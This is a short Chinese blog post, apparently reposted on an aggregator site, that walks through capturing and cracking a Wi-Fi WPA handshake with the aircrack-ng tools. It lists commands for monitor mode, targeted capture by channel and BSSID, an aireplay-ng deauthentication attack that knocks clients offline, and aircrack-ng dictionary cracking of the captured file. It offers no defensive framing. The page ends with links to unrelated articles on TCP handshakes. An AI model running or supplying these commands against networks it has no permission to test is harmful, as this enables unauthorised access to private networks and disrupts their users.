抓握手包

Posted 海鸥博客

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了抓握手包相关的知识,希望对你有一定的参考价值。

Airmon-ng start wlan0
Airodump-ng mon0 
Airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w mobi mon0
-C参数是选择目标信道.如果该信道就目标一个AP使用的话不用加上--bssid,这个参数是为了跟精准的锁定目标~~ -w 是保存握手包的名字.获取后会在当前目录生成一个mobi-01.cap的握手包。这时就不用关闭这条shell而是另外打开一个shell

Aireplay-ng -0 10 -a (AP的mac) -c (客户端的mac) 

-0参数是发起deauth攻击.10 是次数可以调节

-a 即第一条shell中BSSID.下面的AP路由器MAC地址

-c 即STATION下客户机的MAC地址(这条为可选项)

 

Aircrack-ng -w /pentest/passwords/sxsx.lst mobi-01.cap

-w 选择字典 mobi-01.cap 即抓到的握手包

 

以上是关于抓握手包的主要内容,如果未能解决你的问题,请参考以下文章

抓包分析TCP的三次握手和四次握手

一个抓包案例分析 TCP 的三次握手/四次挥手

一个抓包案例分析 TCP 的三次握手/四次挥手

初识Socket,通过抓包分析TCP的三次握手,四次挥手

请教SSL握手过程中,为啥抓包找不到pre-master-key

wireshark抓包三次握手怎么判断有问题